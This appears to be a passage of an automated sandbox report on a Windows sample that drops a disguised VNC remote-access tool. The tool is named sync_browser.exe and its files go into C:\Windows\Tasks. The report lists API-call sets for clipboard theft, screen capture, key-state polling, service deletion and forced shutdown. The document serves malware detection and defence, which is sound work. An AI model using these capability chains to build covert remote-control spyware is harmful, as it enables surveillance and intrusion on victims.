Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7F13A0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,	22_2_00007FF67E7F13A0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7C1DD0 OpenClipboard,EmptyClipboard,CloseClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,	25_2_00007FF67E7C1DD0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7F13A0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,	25_2_00007FF67E7F13A0

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 22_2_00007FF67E7C1AE0 OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,CloseClipboard,

22_2_00007FF67E7C1AE0

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 22_2_00007FF67E7C3770 GetDC,CreateCompatibleDC,CreateCompatibleBitmap,GetDIBits,GetDIBits,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateDIBSection,CreateCompatibleBitmap,DeleteObject,timeGetTime,SelectObject,BitBlt,SelectObject,timeGetTime,timeGetTime,GetPixel,timeGetTime,ReleaseDC,DeleteDC,DeleteObject,

22_2_00007FF67E7C3770

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 22_2_00007FF67E811550 GetAsyncKeyState,MapVirtualKeyA,GetAsyncKeyState,

22_2_00007FF67E811550

Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7D74C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,		22_2_00007FF67E7D74C0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7D74C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,		25_2_00007FF67E7D74C0

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 22_2_00007FF67E7D2E40 OpenSCManagerA,OpenServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

22_2_00007FF67E7D2E40

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 22_2_00007FF67E7DA130 GetVersionExA,OpenInputDesktop,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,SetThreadDesktop,OpenProcess,OpenProcessToken,CloseHandle,GetModuleFileNameA,CreateProcessAsUserA,GetLastError,CloseHandle,CloseHandle,OpenEventA,SetEvent,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,OpenEventA,SetEvent,GetModuleFileNameA,GetDesktopWindow,ShellExecuteA,InitializeCriticalSection,Sleep,SetThreadDesktop,CloseDesktop,

22_2_00007FF67E7DA130

Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7D3550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,	22_2_00007FF67E7D3550
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7D34B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	22_2_00007FF67E7D34B0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7D3550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,	25_2_00007FF67E7D3550
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7D34B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	25_2_00007FF67E7D34B0

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\0271695705143540	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\id2rlx.MxYNRd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\Nfe70s.UFVVkM	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\wFUH4p.aEmode	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\WPSela.LSZr7V	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\0271695705143540.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\sync_browser.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\UltraVNC.ini	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\conhost.exe	Jump to behavior

Source: C:\Users\user\Desktop\7q551ugrWe.exe	Code function: 0_2_00405721	0_2_00405721
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Code function: 0_2_004139D1	0_2_004139D1
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Code function: 0_2_00413AAB	0_2_00413AAB
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Code function: 0_2_00413370	0_2_00413370
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Code function: 0_2_00413D43	0_2_00413D43
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Code function: 0_2_0040AD30	0_2_0040AD30
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7E36D0	22_2_00007FF67E7E36D0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7D0270	22_2_00007FF67E7D0270
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7CC810	22_2_00007FF67E7CC810
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7D9740	22_2_00007FF67E7D9740
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7DAF60	22_2_00007FF67E7DAF60
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7C3770	22_2_00007FF67E7C3770
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7EE780	22_2_00007FF67E7EE780
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E87DF80	22_2_00007FF67E87DF80
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7DC8D0	22_2_00007FF67E7DC8D0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7D20E0	22_2_00007FF67E7D20E0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7D1100	22_2_00007FF67E7D1100
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7CA910	22_2_00007FF67E7CA910
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7D6930	22_2_00007FF67E7D6930
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7DA130	22_2_00007FF67E7DA130
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7EA870	22_2_00007FF67E7EA870
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7C1880	22_2_00007FF67E7C1880
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7DA890	22_2_00007FF67E7DA890
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7DC090	22_2_00007FF67E7DC090
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7D70B0	22_2_00007FF67E7D70B0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7C1DD0	22_2_00007FF67E7C1DD0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7E6DD1	22_2_00007FF67E7E6DD1
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7D8E10	22_2_00007FF67E7D8E10
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7DE610	22_2_00007FF67E7DE610
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7F3E20	22_2_00007FF67E7F3E20
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7E1620	22_2_00007FF67E7E1620
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7E4D7E	22_2_00007FF67E7E4D7E
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7D8590	22_2_00007FF67E7D8590
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7DC5B0	22_2_00007FF67E7DC5B0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E810650	22_2_00007FF67E810650
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7E2650	22_2_00007FF67E7E2650
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7F1660	22_2_00007FF67E7F1660
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7EAE70	22_2_00007FF67E7EAE70
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E88068C	22_2_00007FF67E88068C
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7C4E80	22_2_00007FF67E7C4E80
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7E6BBD	22_2_00007FF67E7E6BBD
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7DB3D0	22_2_00007FF67E7DB3D0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7C7BE2	22_2_00007FF67E7C7BE2
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7D93E0	22_2_00007FF67E7D93E0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7D4C10	22_2_00007FF67E7D4C10
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E87E400	22_2_00007FF67E87E400
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7EA420	22_2_00007FF67E7EA420
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7C7B37	22_2_00007FF67E7C7B37
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7C7B71	22_2_00007FF67E7C7B71
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7DBB80	22_2_00007FF67E7DBB80
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7C4390	22_2_00007FF67E7C4390
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7D7B90	22_2_00007FF67E7D7B90
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7E739B	22_2_00007FF67E7E739B
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7C7BA6	22_2_00007FF67E7C7BA6
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7E2CC0	22_2_00007FF67E7E2CC0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7F1CE0	22_2_00007FF67E7F1CE0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7EDCF0	22_2_00007FF67E7EDCF0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7CDCF0	22_2_00007FF67E7CDCF0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7D1D10	22_2_00007FF67E7D1D10
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7DAD30	22_2_00007FF67E7DAD30
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7F3460	22_2_00007FF67E7F3460
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E882C70	22_2_00007FF67E882C70
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E888C90	22_2_00007FF67E888C90
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7F54A0	22_2_00007FF67E7F54A0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7F5CA0	22_2_00007FF67E7F5CA0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7E51B7	22_2_00007FF67E7E51B7
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7CE1D0	22_2_00007FF67E7CE1D0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E8809F0	22_2_00007FF67E8809F0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7C79E9	22_2_00007FF67E7C79E9
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7C4200	22_2_00007FF67E7C4200
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7C7A1C	22_2_00007FF67E7C7A1C
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7E5A33	22_2_00007FF67E7E5A33
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7ED150	22_2_00007FF67E7ED150
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7C5170	22_2_00007FF67E7C5170
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7EF980	22_2_00007FF67E7EF980
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7D8980	22_2_00007FF67E7D8980
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7C81AD	22_2_00007FF67E7C81AD
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7EC2C0	22_2_00007FF67E7EC2C0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7C7ACF	22_2_00007FF67E7C7ACF
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E8312C0	22_2_00007FF67E8312C0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7C7B04	22_2_00007FF67E7C7B04
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7EAB10	22_2_00007FF67E7EAB10
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7F0330	22_2_00007FF67E7F0330
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7E623E	22_2_00007FF67E7E623E
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E877250	22_2_00007FF67E877250
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7C7A5B	22_2_00007FF67E7C7A5B
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7C2270	22_2_00007FF67E7C2270
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7E8A70	22_2_00007FF67E7E8A70
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7C3A90	22_2_00007FF67E7C3A90
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7C7A9A	22_2_00007FF67E7C7A9A
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7CC810	25_2_00007FF67E7CC810
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7D9740	25_2_00007FF67E7D9740
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7DAF60	25_2_00007FF67E7DAF60
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7C3770	25_2_00007FF67E7C3770
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7EE780	25_2_00007FF67E7EE780
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E87DF80	25_2_00007FF67E87DF80
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7DC8D0	25_2_00007FF67E7DC8D0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7D20E0	25_2_00007FF67E7D20E0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7D1100	25_2_00007FF67E7D1100
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7CA910	25_2_00007FF67E7CA910
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7D6930	25_2_00007FF67E7D6930
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7DA130	25_2_00007FF67E7DA130
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7EA870	25_2_00007FF67E7EA870
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7C1880	25_2_00007FF67E7C1880
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7DA890	25_2_00007FF67E7DA890
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7DC090	25_2_00007FF67E7DC090
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7D70B0	25_2_00007FF67E7D70B0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7C1DD0	25_2_00007FF67E7C1DD0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7E6DD1	25_2_00007FF67E7E6DD1
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7E2DF3	25_2_00007FF67E7E2DF3
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7D8E10	25_2_00007FF67E7D8E10
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7DE610	25_2_00007FF67E7DE610
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7F3E20	25_2_00007FF67E7F3E20
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7E1620	25_2_00007FF67E7E1620
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7E4D7E	25_2_00007FF67E7E4D7E
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7D8590	25_2_00007FF67E7D8590
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7DC5B0	25_2_00007FF67E7DC5B0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7E36D0	25_2_00007FF67E7E36D0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E810650	25_2_00007FF67E810650
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7E2650	25_2_00007FF67E7E2650
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7F1660	25_2_00007FF67E7F1660
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7EAE70	25_2_00007FF67E7EAE70
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E88068C	25_2_00007FF67E88068C
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7C4E80	25_2_00007FF67E7C4E80
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7E6BBD	25_2_00007FF67E7E6BBD
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7DB3D0	25_2_00007FF67E7DB3D0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7C7BE2	25_2_00007FF67E7C7BE2
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7D93E0	25_2_00007FF67E7D93E0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7D4C10	25_2_00007FF67E7D4C10
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E87E400	25_2_00007FF67E87E400
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7EA420	25_2_00007FF67E7EA420
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7C7B37	25_2_00007FF67E7C7B37
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7C7B71	25_2_00007FF67E7C7B71
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7DBB80	25_2_00007FF67E7DBB80
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7C4390	25_2_00007FF67E7C4390
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7D7B90	25_2_00007FF67E7D7B90
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7E739B	25_2_00007FF67E7E739B
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7C7BA6	25_2_00007FF67E7C7BA6
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7F1CE0	25_2_00007FF67E7F1CE0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7EDCF0	25_2_00007FF67E7EDCF0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7CDCF0	25_2_00007FF67E7CDCF0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7D1D10	25_2_00007FF67E7D1D10
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7DAD30	25_2_00007FF67E7DAD30
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7F3460	25_2_00007FF67E7F3460
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E882C70	25_2_00007FF67E882C70
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E888C90	25_2_00007FF67E888C90
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7F54A0	25_2_00007FF67E7F54A0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7F5CA0	25_2_00007FF67E7F5CA0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7E51B7	25_2_00007FF67E7E51B7
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7CE1D0	25_2_00007FF67E7CE1D0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E8809F0	25_2_00007FF67E8809F0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7C79E9	25_2_00007FF67E7C79E9
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7C4200	25_2_00007FF67E7C4200
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7C7A1C	25_2_00007FF67E7C7A1C
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7E5A33	25_2_00007FF67E7E5A33
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7ED150	25_2_00007FF67E7ED150
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7C5170	25_2_00007FF67E7C5170
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7EF980	25_2_00007FF67E7EF980
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7D8980	25_2_00007FF67E7D8980
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7C81AD	25_2_00007FF67E7C81AD
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7EC2C0	25_2_00007FF67E7EC2C0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7C7ACF	25_2_00007FF67E7C7ACF
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E8312C0	25_2_00007FF67E8312C0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7C7B04	25_2_00007FF67E7C7B04
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7EAB10	25_2_00007FF67E7EAB10
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7F0330	25_2_00007FF67E7F0330
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7E623E	25_2_00007FF67E7E623E
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E877250	25_2_00007FF67E877250
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7C7A5B	25_2_00007FF67E7C7A5B
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7C2270	25_2_00007FF67E7C2270
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7E8A70	25_2_00007FF67E7E8A70
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7D0270	25_2_00007FF67E7D0270
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7C3A90	25_2_00007FF67E7C3A90
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7C7A9A	25_2_00007FF67E7C7A9A

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7V F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24

Source: C:\Windows\Tasks\sync_browser.exe	Code function: String function: 00007FF67E879500 appears 42 times
Source: C:\Windows\Tasks\sync_browser.exe	Code function: String function: 00007FF67E7C3730 appears 730 times
Source: C:\Windows\Tasks\sync_browser.exe	Code function: String function: 00007FF67E877C50 appears 60 times
Source: C:\Windows\Tasks\sync_browser.exe	Code function: String function: 00007FF67E82A3B0 appears 38 times
Source: C:\Windows\Tasks\sync_browser.exe	Code function: String function: 00007FF67E7CAE30 appears 34 times
Source: C:\Windows\Tasks\sync_browser.exe	Code function: String function: 00007FF67E8770B4 appears 56 times
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Code function: String function: 004026B0 appears 38 times

Source: WPSela.LSZr7V.0.dr	Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: WPSela.LSZr7V.0.dr	Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: WPSela.LSZr7V.2.dr	Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: WPSela.LSZr7V.2.dr	Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: sync_browser.exe.6.dr	Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: sync_browser.exe.6.dr	Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate

Source: 7q551ugrWe.exe, 00000000.00000003.1349581148.000000000295B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWinVNC.exe0 vs 7q551ugrWe.exe
Source: 7q551ugrWe.exe, 00000000.00000003.1346462546.00000000025A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamebrowser.exe( vs 7q551ugrWe.exe
Source: 7q551ugrWe.exe, 00000000.00000000.1343987548.000000000041C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamebrowser.exe( vs 7q551ugrWe.exe
Source: 7q551ugrWe.exe, 00000000.00000003.1349858008.000000000098B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWinVNC.exe0 vs 7q551ugrWe.exe
Source: 7q551ugrWe.exe, 00000000.00000003.1347959077.0000000002792000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCONHOST.EXEj% vs 7q551ugrWe.exe
Source: 7q551ugrWe.exe	Binary or memory string: OriginalFilenamebrowser.exe( vs 7q551ugrWe.exe

Source: 7q551ugrWe.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: conhost.exe.6.dr

